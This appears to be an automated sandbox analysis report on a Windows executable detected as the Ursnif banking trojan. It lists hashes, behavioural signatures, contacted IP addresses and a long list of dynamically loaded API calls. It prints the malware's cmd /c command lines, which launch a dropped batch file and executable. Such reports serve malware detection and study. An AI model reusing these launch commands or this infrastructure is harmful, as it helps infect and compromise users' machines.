2020-03-24 09:50:32,125 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-03-24 09:50:32,125 [root] WARNING: File at path "C:\gGNnZRIY\debugger" does not exist, skip.
2020-03-24 09:50:32,125 [root] INFO: Analysis completed.

MalScore: 10.0
Detection: Ursnif

Machine
Name: target-02
Label: target-02
Manager: ESX
Started On: 2020-03-24 09:47:01
Shutdown On: 2020-03-24 09:50:44

File Details

File Name ddaa6aba4618362ad65ad4d6eb6d1ff7cc909f9dcb98b0aa2c6627a2a7d5b514
File Size 322048 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0116e1cc3ef60e3cb910654c95e1d1c6
SHA1 a9126493e87f3f761efe8ae9aed4cc4e58ed819e
SHA256 ddaa6aba4618362ad65ad4d6eb6d1ff7cc909f9dcb98b0aa2c6627a2a7d5b514
SHA512 40f2880784f086494f19109aa0ca196fe4d0b5764ee17da8d2227582693ea9097b9e977faa1e62288b6bc0f56f813672150915b018b14a21b7014df3a9aaee6a
CRC32 588CA946
Ssdeep 6144:BoxAQURWtJ8ru6Cf6kkRrrsNSc6bkuk+QyR3/oOYW39sE6cXsQFqvCE:KTH8ru5kEu9tx/kWtvfFYCE
TrID
  • 38.4% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 26.3% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 11.8% (.EXE) OS/2 Executable (generic) (2029/13)
  • 11.6% (.EXE) Generic Win/DOS Executable (2002/3)
  • 11.6% (.EXE) DOS Executable Generic (2000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

Behavioural detection: Executable code extraction
SetUnhandledExceptionFilter detected (possible anti-debug)
Executed a command line with a /C or /R argument, which terminates the command shell on completion and can be used to hide execution
command: cmd /c ""C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE""
command: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE""
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 0 triggered the Yara rule 'embedded_win_api'
Hit: PID 3064 triggered the Yara rule 'vmdetect'
Hit: PID 2980 triggered the Yara rule 'shellcode_patterns'
Hit: PID 2980 triggered the Yara rule 'Ursnif'
Possible date expiration check, exits too soon after checking local time
process: KmHJvidHgRX.exe, PID 3064
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat
DeletedFile: C:\Users\user\AppData\Local\Temp\KmHJvidHgRX.exe
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab6E6C.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar6E6D.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab6F0A.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar6F0B.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab78DB.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar78DC.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab859A.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar859B.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab87BE.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar87BF.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab9E9F.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar9EA0.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabA4B9.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarA4BA.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabA509.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarA50A.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabA77B.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarA77C.tmp
Attempts to connect to a dead IP:Port (5 unique times)
IP: 192.229.232.240:80 (United States)
IP: 185.85.0.29:443 (Germany)
IP: 192.42.116.41:80 (Netherlands)
IP: 185.85.0.29:80 (Germany)
IP: 23.202.161.73:80 (United States)
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/RtlUnwind
DynamicLoader: ntdll.dll/NtQueryVirtualMemory
DynamicLoader: SHLWAPI.dll/PathFindExtensionW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindExtensionA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: SHLWAPI.dll/StrTrimW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInfo
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceRegistryPropertyA
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsA
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/GetCommandLineW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/GetLongPathNameW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: USER32.dll/DefWindowProcW
DynamicLoader: USER32.dll/SendMessageW
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/CreateWindowExW
DynamicLoader: USER32.dll/SetWindowLongW
DynamicLoader: USER32.dll/SetClassLongW
DynamicLoader: USER32.dll/SystemParametersInfoW
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetWindowLongW
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: USER32.dll/GetForegroundWindow
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/GetMessageW
DynamicLoader: USER32.dll/keybd_event
DynamicLoader: USER32.dll/DestroyWindow
DynamicLoader: USER32.dll/wsprintfW
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/RegDeleteValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: SHELL32.dll/
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: SHELL32.dll/ShellExecuteExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: USER32.dll/FindWindowA
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: kernel32.dll/Wow64EnableWow64FsRedirection
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel
DynamicLoader: ADVAPI32.dll/SaferCloseLevel
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/RtlUnwind
DynamicLoader: ntdll.dll/NtQueryVirtualMemory
DynamicLoader: SHLWAPI.dll/PathFindExtensionW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindExtensionA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: SHLWAPI.dll/StrTrimW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInfo
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceRegistryPropertyA
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsA
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/GetCommandLineW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64ReadVirtualMemory64
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/strcpy
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/NtResumeProcess
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtSuspendProcess
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/_snprintf
DynamicLoader: ntdll.dll/_wcsupr
DynamicLoader: ntdll.dll/_strupr
DynamicLoader: ntdll.dll/memmove
DynamicLoader: ntdll.dll/wcscpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwQueryKey
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/wcstombs
DynamicLoader: ntdll.dll/RtlImageNtHeader
DynamicLoader: ntdll.dll/RtlAdjustPrivilege
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/sprintf
DynamicLoader: ntdll.dll/wcscat
DynamicLoader: ntdll.dll/__C_specific_handler
DynamicLoader: ntdll.dll/__chkstk
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/QueueUserWorkItem
DynamicLoader: kernel32.dll/SystemTimeToFileTime
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/RemoveDirectoryA
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/DeleteFileA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/HeapReAlloc
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/GetCurrentThread
DynamicLoader: kernel32.dll/GetSystemTimeAsFileTime
DynamicLoader: kernel32.dll/GetWindowsDirectoryA
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/DuplicateHandle
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/MapViewOfFile
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/OpenWaitableTimerA
DynamicLoader: kernel32.dll/OpenMutexA
DynamicLoader: kernel32.dll/WaitForMultipleObjects
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/UnregisterWait
DynamicLoader: kernel32.dll/TlsGetValue
DynamicLoader: kernel32.dll/LoadLibraryExW
DynamicLoader: kernel32.dll/TlsSetValue
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/RegisterWaitForSingleObject
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/TlsAlloc
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/CreateFileMappingA
DynamicLoader: kernel32.dll/OpenFileMappingA
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/QueueUserAPC
DynamicLoader: kernel32.dll/OpenThread
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/CallNamedPipeA
DynamicLoader: kernel32.dll/WaitNamedPipeA
DynamicLoader: kernel32.dll/ConnectNamedPipe
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetOverlappedResult
DynamicLoader: kernel32.dll/DisconnectNamedPipe
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/CreateNamedPipeA
DynamicLoader: kernel32.dll/CancelIo
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/RemoveVectoredExceptionHandler
DynamicLoader: kernel32.dll/SleepEx
DynamicLoader: kernel32.dll/AddVectoredExceptionHandler
DynamicLoader: kernel32.dll/OpenEventA
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/RaiseException
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/RemoveDirectoryW
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/SetFilePointerEx
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/GetUserNameA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: SHLWAPI.dll/StrToIntExA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrTrimA
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpQueryOption
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/FreeAddrInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSARecv
DynamicLoader: WS2_32.dll/WSASend
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: schannel.DLL/SpUserModeInitialize
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: secur32.dll/FreeContextBuffer
DynamicLoader: ncrypt.dll/SslOpenProvider
DynamicLoader: ncrypt.dll/GetSChannelInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/SslIncrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslImportKey
DynamicLoader: bcryptprimitives.dll/GetCipherInterface
DynamicLoader: ncrypt.dll/SslLookupCipherSuiteInfo
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ncrypt.dll/BCryptOpenAlgorithmProvider
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptGetProperty
DynamicLoader: ncrypt.dll/BCryptCreateHash
DynamicLoader: ncrypt.dll/BCryptHashData
DynamicLoader: ncrypt.dll/BCryptFinishHash
DynamicLoader: ncrypt.dll/BCryptDestroyHash
DynamicLoader: CRYPT32.dll/CertGetCertificateChain
DynamicLoader: USERENV.dll/GetUserProfileDirectoryW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: USERENV.dll/RegisterGPNotification
DynamicLoader: GPAPI.dll/RegisterGPNotificationInternal
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: sechost.dll/QueryServiceConfigW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: SensApi.dll/IsNetworkAlive
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
